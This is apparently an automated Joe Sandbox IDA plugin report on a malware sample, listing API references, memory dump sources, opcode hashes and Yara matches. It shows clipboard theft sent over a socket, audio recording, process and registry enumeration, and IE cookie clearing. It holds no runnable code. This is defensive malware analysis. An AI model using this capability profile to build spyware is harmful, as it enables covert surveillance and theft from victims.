                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 00415A46
                                                  • EmptyClipboard.USER32 ref: 00415A54
                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                  • OpenClipboard.USER32 ref: 00415A61
                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                  • CloseClipboard.USER32 ref: 00415A89
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID:
                                                  • API String ID: 2172192267-0
                                                  APIs
                                                  • _free.LIBCMT ref: 00447EBC
                                                  • _free.LIBCMT ref: 00447EE0
                                                  • _free.LIBCMT ref: 00448067
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                  • _free.LIBCMT ref: 00448233
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  APIs
                                                  • _free.LIBCMT ref: 02138123
                                                  • _free.LIBCMT ref: 02138147
                                                  • _free.LIBCMT ref: 021382CE
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 021382E0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 02138358
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 02138385
                                                  • _free.LIBCMT ref: 0213849A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0214306A,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 02142E3D
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142EC0
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0214306A,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142F53
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142F6A
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142FE6
                                                  • __freea.LIBCMT ref: 02143011
                                                  • __freea.LIBCMT ref: 0214301D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 2829977744-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: udp
                                                  • API String ID: 0-4243565622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  APIs
                                                    • Part of subcall function 02100820: SetLastError.KERNEL32(0000000D,02100D9F,?,00000000), ref: 02100826
                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02100D7C), ref: 02100E2B
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 02100E91
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02100E98
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02100FA6
                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02100D7C), ref: 02100FD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
                                                  • String ID: A
                                                  • API String ID: 4001361727-520424720
                                                  • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction ID: 314984e74fac0af280dd1e432e59e9747256e9dc4c0c1027df664a91a4a59dc8
                                                  • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction Fuzzy Hash: 0B61C070685305AFC710AF25C9C1B6A7BA6BF88704F044029F9059B2C2EBF4E895DBE5
                                                  APIs
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • _free.LIBCMT ref: 00444086
                                                  • _free.LIBCMT ref: 0044409D
                                                  • _free.LIBCMT ref: 004440BC
                                                  • _free.LIBCMT ref: 004440D7
                                                  • _free.LIBCMT ref: 004440EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: J7D
                                                  • API String ID: 3033488037-1677391033
                                                  • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                  • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                  • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                  • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                  • __fassign.LIBCMT ref: 0044A180
                                                  • __fassign.LIBCMT ref: 0044A19B
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                  • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                  • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                  • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                  • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                  • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: HE$HE
                                                  • API String ID: 269201875-1978648262
                                                  • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                  • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0213AA9F,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0213A36C
                                                  • __fassign.LIBCMT ref: 0213A3E7
                                                  • __fassign.LIBCMT ref: 0213A402
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0213A428
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0213AA9F,00000000,?,?,?,?,?,?,?,?,?,0213AA9F,?), ref: 0213A447
                                                  • WriteFile.KERNEL32(?,?,00000001,0213AA9F,00000000,?,?,?,?,?,?,?,?,?,0213AA9F,?), ref: 0213A480
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
                                                  • Instruction ID: a3075fb2f9c7d815304240a4f4cf18ba0bf59307ffae35712d59676bf0bb4f26
                                                  • Opcode Fuzzy Hash: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
                                                  • Instruction Fuzzy Hash: 5151E870E40205AFCF11CFA8D845AEEBBFAEF09310F18416AE999E7291D730D940CB60
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                    • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                    • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: TUFTUF$>G$DG$DG
                                                  • API String ID: 3114080316-344394840
                                                  • Opcode ID: c3dd97182f9ce844ebb49620a6f088c96f11194fd2e2bdef260f1bda12a991b1
                                                  • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                  • Opcode Fuzzy Hash: c3dd97182f9ce844ebb49620a6f088c96f11194fd2e2bdef260f1bda12a991b1
                                                  • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                  APIs
                                                    • Part of subcall function 0210B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3D3
                                                    • Part of subcall function 0210B3C2: IsWow64Process.KERNEL32(00000000,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3DA
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 020FE928
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 020FE94C
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 020FE95B
                                                  • CloseHandle.KERNEL32(00000000), ref: 020FEB12
                                                    • Part of subcall function 0210B3EE: OpenProcess.KERNEL32(00000400,00000000), ref: 0210B403
                                                    • Part of subcall function 0210B3EE: IsWow64Process.KERNEL32(00000000,?), ref: 0210B40E
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0210B5FC
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0210B60F
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 020FEB03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID: PgF
                                                  • API String ID: 2180151492-654241383
                                                  • Opcode ID: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
                                                  • Instruction ID: 7f7c8a749285d6edc9369c35a104b81fbc4cef4b7dee7e4d8ea4c5b1837d81a0
                                                  • Opcode Fuzzy Hash: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
                                                  • Instruction Fuzzy Hash: CD4103312883405FD3A5FB20DC51AEF77EABFE4300F54456DEA4A82594EF309A09DE56
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                  • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                  • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                  • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000104), ref: 00442714
                                                  • _free.LIBCMT ref: 004427DF
                                                  • _free.LIBCMT ref: 004427E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$XNY$h'X
                                                  • API String ID: 2506810119-3846325169
                                                  • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                  • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 021040ED
                                                  • LoadLibraryA.KERNEL32(?), ref: 0210412F
                                                  • LoadLibraryA.KERNEL32(?), ref: 0210418E
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 021041B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressDirectoryProcSystem
                                                  • String ID: g<A$#v
                                                  • API String ID: 4217395396-1454644526
                                                  • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction ID: 6be393f0a8f1570aa92cf74d39ba2057592789e94e9d3bed7e93642b9864afb8
                                                  • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction Fuzzy Hash: BF31E5B19463156BD320EB64DCC4E9F77DCEF44794F040A25E994E3240E7B4E9418BEA
                                                  APIs
                                                  • _strftime.LIBCMT ref: 020F1D3A
                                                    • Part of subcall function 020F1E4F: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 020F1EBB
                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 020F1DEC
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 020F1E2A
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 020F1E39
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: `=G$x=G
                                                  • API String ID: 3809562944-3004145341
                                                  • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                  • Instruction ID: ffc8bc6ff22630520a3e4628cbae0019d8ae119b97ac346e3cf3b0d880e230a4
                                                  • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                  • Instruction Fuzzy Hash: F8319E325843409FC3A4EF24DC54ADE77EAFB84300F004439EA59829B5EF70AA49DF5A
                                                  APIs
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: 168306c1d9a20041e62edbc44da32d9946e7b93686fd1ff98ae257cc9e607522
                                                  • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                  • Opcode Fuzzy Hash: 168306c1d9a20041e62edbc44da32d9946e7b93686fd1ff98ae257cc9e607522
                                                  • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                  • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                  • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                  • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                  • Instruction ID: 988fa648db5904b0786bfa03924476be5c349cb7512080152120f4f263a4bd0b
                                                  • Opcode Fuzzy Hash: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                  • Instruction Fuzzy Hash: 7411D672588219BFCB212FB69C48D6B7B6FDF85771B510569F819C6240DF31C901CAA0
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                  • int.LIBCPMT ref: 0040FC0F
                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: P[G
                                                  • API String ID: 2536120697-571123470
                                                  • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                  • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                  • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                  • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 020FFE63
                                                  • int.LIBCPMT ref: 020FFE76
                                                    • Part of subcall function 020FD147: std::_Lockit::_Lockit.LIBCPMT ref: 020FD158
                                                    • Part of subcall function 020FD147: std::_Lockit::~_Lockit.LIBCPMT ref: 020FD172
                                                  • std::_Facet_Register.LIBCPMT ref: 020FFEB2
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 020FFED8
